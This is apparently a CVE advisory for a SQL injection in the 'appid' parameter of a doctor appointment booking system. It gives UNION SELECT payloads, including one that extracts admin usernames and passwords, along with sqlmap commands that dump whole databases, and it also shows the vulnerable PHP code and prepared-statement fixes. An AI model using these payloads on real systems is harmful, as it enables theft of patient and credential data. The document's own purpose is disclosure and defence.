The vulnerability in ProjectWorlds’ Online Doctor Appointment Booking System 1.0 (CVE-2025-3186) allows remote attackers to execute arbitrary SQL queries via the `appid` parameter in /patient/invoice.php. This occurs due to improper input sanitization, enabling attackers to manipulate database queries. The flaw is exploitable without authentication, making it critical. Attackers can extract sensitive data, modify records, or execute administrative commands. The exploit is publicly available, increasing the risk of widespread attacks.
DailyCVE Form:
Platform: Online Doctor Booking
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/15/2025
What Undercode Say:
Exploitation:
1. Craft a malicious URL:
```
http://target.com/patient/invoice.php?appid=1' UNION SELECT 1,2,3,4,5-- -
```
2. Use SQLmap for automation:
```
sqlmap -u "http://target.com/patient/invoice.php?appid=1" --dbs
```
3. Extract admin credentials:
```
1' UNION SELECT username,password,3,4 FROM admins-- -
```
Protection:
1. Patch: Apply vendor updates.
2. Input sanitization:
```php
// Escaping only protects a value that is placed inside quotes in the SQL text;
// for an unquoted integer such as appid, cast or validate it as an integer instead.
$appid = mysqli_real_escape_string($conn, $_GET['appid']);
```
3. Use prepared statements:
```php
$stmt = $conn->prepare("SELECT * FROM invoices WHERE appid = ?");
$stmt->bind_param("i", $appid); // bound as an integer, never interpolated into the query
$stmt->execute();
```
4. WAF rules: Block suspicious SQL patterns.
5. Log monitoring: Detect repeated injection attempts.
Analytics:
- Attack Vector: Remote (HTTP)
- Impact: Data theft, system compromise
- Mitigation Score: 8/10 (with patches)
Commands:
- Test vulnerability:
```
curl "http://target.com/patient/invoice.php?appid=1'"
```
- Database dump:
```
sqlmap -u "http://target.com/patient/invoice.php?appid=1" --dump-all
```
Code Snippets:
- Vulnerable code:
```php
// The raw request parameter is concatenated directly into the SQL string.
$appid = $_GET['appid'];
$query = "SELECT * FROM invoices WHERE appid = $appid";
```
- Secure fix:
```php
// The value travels to the database as a bound parameter, not as SQL text.
$stmt = $conn->prepare("SELECT * FROM invoices WHERE appid = ?");
$stmt->execute([$appid]);
```
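The following is an added example, not the vendor's code, that combines the protection steps above (integer validation, a prepared statement, and logging of rejected input) into one hardened version of the invoice lookup. It assumes `$conn` is an existing mysqli connection with the mysqlnd driver and that `invoices.appid` is an integer column, as the snippets above imply.

```php
<?php
// Added example (not the vendor's code): hardened lookup for /patient/invoice.php.
// Assumes $conn is an existing mysqli connection (mysqlnd) and invoices.appid is an integer column.
declare(strict_types=1);

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Accept only a positive integer; quotes, SQL keywords or an empty value are rejected
// before anything reaches the database. Escaping alone would not help here because the
// vulnerable query interpolates appid unquoted.
function parse_appid(?string $raw): ?int
{
    if ($raw === null) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Fetch one invoice with a prepared statement: the id is bound as data,
// so the SQL text never changes regardless of the input.
function fetch_invoice(mysqli $conn, int $appid): ?array
{
    $stmt = $conn->prepare('SELECT * FROM invoices WHERE appid = ?');
    $stmt->bind_param('i', $appid);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

$appid = parse_appid($_GET['appid'] ?? null);
if ($appid === null) {
    // Record the rejection for the log-monitoring step; the raw value is not written
    // to the log so that attacker-controlled input cannot corrupt log lines.
    error_log(sprintf(
        'invoice.php: rejected non-integer appid (len=%d) from %s',
        strlen((string) ($_GET['appid'] ?? '')),
        $_SERVER['REMOTE_ADDR'] ?? 'unknown'
    ));
    http_response_code(400);
    exit('Invalid appointment id');
}

$invoice = fetch_invoice($conn, $appid);
if ($invoice === null) {
    http_response_code(404);
    exit('Invoice not found');
}
```

Repeated 400 responses from one source on this endpoint are the signal the "Log monitoring" step above refers to.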
End of Report.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode